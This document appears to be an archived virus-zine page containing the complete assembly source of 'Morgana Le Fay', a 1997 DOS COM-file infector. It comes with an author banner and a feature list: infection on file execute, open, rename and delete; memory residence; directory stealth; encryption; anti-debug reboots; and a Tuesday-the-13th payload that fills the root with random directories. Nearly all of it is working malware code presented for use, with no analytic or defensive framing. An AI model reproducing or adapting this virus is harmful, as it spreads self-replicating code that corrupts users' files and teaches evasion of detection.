Copy Link
Add to Bookmark
Report
SLAM4.034: Morgana Le Fay by Int13h/Ikx
‹ ‹ V S Author: Int13h
‹€ €‹ I U Origin: Paraguay ‹fl ‹flflflfl
€€‹‹€€ R ‹fl €
€€ € €€ ‹flfl‹ fl€fl€ ‹flflfl ‹flfl‹ fl€flfl‹ ‹flfl‹ ‹fl ‹flflfl €flfl ‹flfl‹ € €
€€ fl €€ € € €flfl€ € fl€ €flfl€ € € €flfl€ ‹fl €fl € €flfl€ flfl€
€ fl€ flfl fl fl flfl fl fl fl fl fl fl flflflflfl flflfl fl fl fl flflfl
fl‹ fl‹ He aqu° a la hechicera que con su poder de antiguos amaneceres
fl ha despertado para sembrar el p†nico y el terror entre los mortales
COM fast infector. Infects on execute, rename, delete, open, g/s attribs
TSR using the INT 27h. FCB (11h/12h) and DTA (4eh/4fh) stealth.
Encrypted. Manipulates SFT. Infection mark in the seconds field.
Crazy payload on tuesday 13s: random directories creation on the root.
Viral code is at offset 0 and hoste's beginning is at end of file.
Anti-debug code. Installs dummy error handler. Avoids COMMAND.COM.
I code this just to test the INT 27h (a bit bored of MCBs) and not destructive overwriting infection. Greetz to Methyl, DAV and all 29A crew!
MorganaLeFay Segment
assume cs:MorganaLeFay,ds:MorganaLeFay,es:MorganaLeFay,ss:MorganaLeFay
org 100h
Longitud = (offset Buffer-offset Inicio)
SkipThem = (offset Encripted-offset Inicio)
Cripted = (offset Buffer-offset Encripted)
Inicio: mov si,offset Encripted ; Start of encrypted stuff
push si ; SI to stack
mov di,si
mov cx,Cripted
Cifra: lodsb ; mov al,ds:[si]
db 034h ; xor al,byte ptr Clave
Clave db 0
stosb ; mov al,es:[di]
loop Cifra
ret
Encripted:
mov ax,3521h ; Get int 21h's handler
int 21h
cmp bx,offset Handler_21h ; Check if we are installed
je Ya_en_Memoria ; Already!
mov word ptr [Vieja21h],bx ; Grab 21h's offset
mov word ptr [Vieja21h+2],es ; Grab 21h's segment
mov ax,2521h ; Hook Int 21h
mov dx,offset Handler_21h
int 21h
mov ax,cs:[02ch] ; Environment Segment
mov es,ax
mov ah,49h ; Free it
int 21h
mov dx,offset Fin ; Last byte + 1
int 27h ; Doesn't return control
Ciao: db 2eh
int 19h ; Reboot if DEBUG or TBCLEAN running
nop
Ya_en_Memoria:
mov ax,2503h ; Hook int 03h
mov dx,offset Ciao
int 21h
push si
pop si
dec sp ; Stack test
dec sp
pop di
cmp si,di
jnz Ciao
push cs cs ; Fixear segments
pop ds es
mov ah,2ah
int 21h
cmp dl,13d ; Payload on tuesday 13s
jne Retornar_Control
sub ah,ah
cmp al,2
jne Retornar_Control
in al,40h
cmp al,200d ; Get a random byte
jb Retornar_Control
xchg bx,ax ; Number of trash directories to create
Llama: call kreadirs ; Call the kreator routine
dec bx
and bx,bx ; Enough?
jnz Llama
Retornar_Control:
mov si,offset Copier ; Move the little loader to heap
mov di,64666 ; at this offset
mov ax,di ; Save the address to jmp l8er
mov cx,5
repe movsw ; Copy words
movsb ; and the byte!
db 0beh ; mov si,xx xx
Originales dw ? ; EOF (original hoste's data)
mov di,100h ; 100h, COM entry point
add si,di ; 100h, for da PSP
push di ; DI to stack
mov cx,Longitud ; Number of bytes to move
xor bx,bx ; Clear bx
xor dx,dx ; Clean dx
jmp ax ; Jmp the the code loader (at heap)
Copier: repe movsb ; Move the required data
xor si,si ; Clear si
xor di,di ; Blank di
mov ax,di ; Clear ax
sub cx,cx ; Blank cx
ret ; Run da hoste!
Stealth1: ; FCB stealth
pushf
call dword ptr cs:[Vieja21h]
test al,al
jnz ErrorDir ; Error
push ax bx es
mov ah,51h ; Get PSP address
int 21h
mov es,bx
cmp bx,es:[16h]
jne Fuera
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh
int 21h
pop ax
inc al ; ff+1=0 if extended
jnz FCBComun
add bx,7 ; Convert it to a normal one
FCBComun:
mov al,byte ptr es:[bx+17h]
and al,00011111b
cmp al,00011110b ; 60 seconds?
jne Fuera
cmp word ptr es:[bx+1dh],Longitud
ja Sustraer
cmp word ptr es:[bx+1fh],0
je Fuera
Sustraer:sub word ptr es:[bx+1dh],Longitud
Fuera: pop es bx ax
ErrorDir:
retf 2
Handler_21h:
cmp ah,11h ; FCB find first
je Stealth1
cmp ah,12h ; FCB find next
je Stealth1
cmp ah,4eh ; DTA find first
je Stealth2
cmp ah,4fh ; DTA find next
je Stealth2
cmp ax,04b00h ; Execution
je Infectar
cmp ah,056h ; Rename
je Infectar
cmp ah,041h ; Delete
je Infectar
cmp ah,043h ; Get/Change attributes
je Infectar
cmp ah,3dh ; Open
je Infectar
Do_It: db 0eah ; Jmp far to old
Vieja21h dd 0 ; 21h's handler
Stealth2: ; DTA stealth
pushf
call dword ptr cs:[Vieja21h]
jc Weasseline_Suxx
pushf
push ax di es bx
mov ah,2fh ; DTAddress
int 21h
mov ax,es:[bx+16h]
and al,00011111b
cmp al,00011110b ; 60 seconds?
jne Paso
cmp word ptr es:[bx+1ah],Longitud
jb Paso
sub word ptr es:[bx+1ah],Longitud
Paso: pop bx es di ax
popf
Weasseline_Suxx:
retf 2
Saltar: jmp Popear
Infectar:
push ax bx cx dx si di es ds ; Save all
push dx
push ds
mov ax,3524h ; Grab Int 24h
int 21h
mov word ptr cs:[Vieja24h],bx
mov word ptr cs:[Vieja24h+2],es
push cs
pop ds
mov ax,2524h ; Hook Int 24h
mov dx,offset Manejador24h
int 21h
pop ds
pop dx
push ds
pop es
cld
mov di,dx
mov cx,128
mov al,'.'
repne scasb ; Look 4 da period
jnz Saltar
cmp word ptr es:[di-3],'dn' ; commaND?
je Saltar
cmp word ptr es:[di-3],'DN' ; commaND?
je Saltar
xchg si,di
lodsw
or ax,2020h
cmp ax,'oc'
jne Saltar
lodsb
or al,20h
cmp al,'m' ; .COM?
jne Saltar
mov ax,3d00h ; Open DS:DX in read only mode
pushf
call dword ptr cs:[Vieja21h]
jc Saltar ; Shits happens
xchg bx,ax ; Put handle in BX
mov ax,5700h ; Get file's date & time
int 21h
mov word ptr cs:[Fecha],dx ; Save date
mov word ptr cs:[Hora],cx ; Save time
and cl,00011111b
cmp cl,00011110b ; 60 seconds?
jne NoInfectado
Closear:jmp Cerrar ; Already sucked!
Noinfectado:
push cs cs ; Fix segments
pop ds es
mov ah,3fh ; Read hoste's first bytes
mov cx,Longitud ; to our buffer
mov dx,offset Buffer
int 21h
mov si,dx
mov ax,[si] ; For comparisons
cmp ax,021b8h ; Already sucked!
je Closear
add ah,al
cmp ah,167d ; MZ, ZM, etc. Fake COM
je Cerrar
mov ax,4202h ; Pointer to EOF
xor cx,cx
cwd
int 21h
and dx,dx ; Bigger than a segment?
jnz Cerrar
cmp ax,63000d ; Too big
ja Cerrar
cmp ax,Longitud ; At least a bit bigger than virus
jbe Cerrar
mov word ptr [Originales],ax ; Save EOF in our variable
push bx
mov ax,1220h
int 2fh
mov ax,1216h ; Here we are manipulating SFT
xor bh,bh
mov bl,es:[di]
int 2fh
mov byte ptr es:[di+2],01 ; Write access mode
pop bx
mov ah,40h
mov dx,offset Buffer ; Write original data to EOF
mov cx,Longitud
int 21h
push cs
pop es
in al,40h
mov byte ptr [Clave],al ; Encryption key
xor al,al
mov si,100h ; Copy virus to buffer
mov di,offset Buffer
mov cx,Longitud
repe movsb
mov si,(offset Buffer+SkipThem)
mov di,si ; Encrypts the copy
mov cx,Cripted
call Cifra
mov ax,4200h
sub cx,cx ; Move pointer to BOF
cwd
int 21h
mov ah,40h
mov dx,offset Buffer ; Write virus in the beginning
mov cx,Longitud
int 21h
mov ax,5701h
db 0bah
Fecha dw 0 ; Restore date and time
db 0b9h
Hora dw 0
and cl,11100000b ; Mark with 62 in the seconds field
or cl,00011110b
int 21h
Cerrar: mov ah,3eh ; Close file
int 21h
Popear: push cs
pop ds
lds dx,dword ptr [Vieja24h] ; Restore INT 24h's handler
mov ax,2524h
int 21h
pop ds es di si dx cx bx ax ; Restore registers
jmp Do_It ; Run the INT 21h original
KrEaDiRs:
xor cx,cx ; Clear cx
in al,40h
Divide: shr al,1
cmp al,8 ; Length below or equal to 8
ja Divide
or al,al ; Length=0?
jnz Sigue
inc al ; At least 1
Sigue: mov cl,al ; Set up the counter
mov di,offset Here ; Point to the directory name
Busco:mov si,offset Textucho ; Chooses characters from our text
in al,40h ; Random byte
cmp al,130 ; 130?
jb Conti
shr al,1 ; Divide it by 2
Conti: xor ah,ah
add si,ax ; Offset inside the text
movsb ; Write to directory name buffer
loop Busco ; ...and still we go
mov ah,39h ; Create random directories in the root
mov dx,offset directorio
int 21h
ret
Manejador24h:
xor al,al
iret
Vieja24h dw 0,0
Textucho db " #Morgana Le Fay#"
db " (c) Int13h Technologies '97"
db " Kingdom of Paraguay"
db " La muerte tocar† con sus alas a"
db " quien perturbe el sue§o de Morgana "
Directorio db '\'
Here db 9 dup (0)
Buffer db (offset Buffer-offset Inicio) dup (0)
Fin: ; End in memory
MorganaLeFay ends
End Inicio
